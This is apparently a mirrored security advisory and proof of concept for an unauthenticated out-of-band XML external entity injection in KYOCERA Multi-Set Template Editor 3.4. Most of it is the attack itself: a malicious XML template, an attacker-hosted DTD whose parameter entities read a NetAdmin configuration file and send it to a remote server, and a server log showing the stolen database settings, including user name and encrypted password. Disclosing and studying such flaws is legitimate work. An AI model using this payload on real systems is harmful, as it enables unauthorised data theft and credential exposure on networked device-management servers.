KYOCERA Multi-Set Template Editor 3.4 – Out-Of-Band XML External Entity Injection

  • 作者: LiquidWorm
    日期: 2018-04-09
  • 类别:
  • 来源:
  • #Vendor: KYOCERA Corporation
    #Affected version: 3.4.0906
    #Summary: KYOCERA Net Admin is Kyocera's unified
    #device management software that uses a web-based
    #platform to give network administrators easy and
    #uncomplicated control to handle a fleet for up to
    #10,000 devices. Tasks that used to require multiple
    #programs or walking to each printer can now be
    #accomplished in a single, fast and modern environment.
    #Desc: KYOCERA Multi-Set Template Editor (part of Net
    #Admin) suffers from an unauthenticated XML External Entity
    #(XXE) injection vulnerability using the DTD parameter
    #entities technique resulting in disclosure and retrieval
    #of arbitrary data from the affected node via out-of-band
    #(OOB) channel attack. The vulnerability is triggered when
    #input passed to the Multi-Set Template Editor (kmmted.exe)
    #called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
    #is not sanitized while parsing a 5.x Multi-Set template XML
    #Tested on: Microsoft Windows 7 Professional SP1 (EN)
    # Apache Tomcat/8.5.15
    #Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
    #Advisory ID: ZSL-2018-5459
    #Advisory URL:
    <?xml version="1.0" encoding="UTF-8" ?>
    <!ENTITY % remote SYSTEM "">
    Attacker's xxe.xml:
    <!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\">
    <!ENTITY % root "<!ENTITY &#37; oob SYSTEM ';'> ">
    Data retrieval:
    lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
    Serving HTTP on port 7777 ... - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 - - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -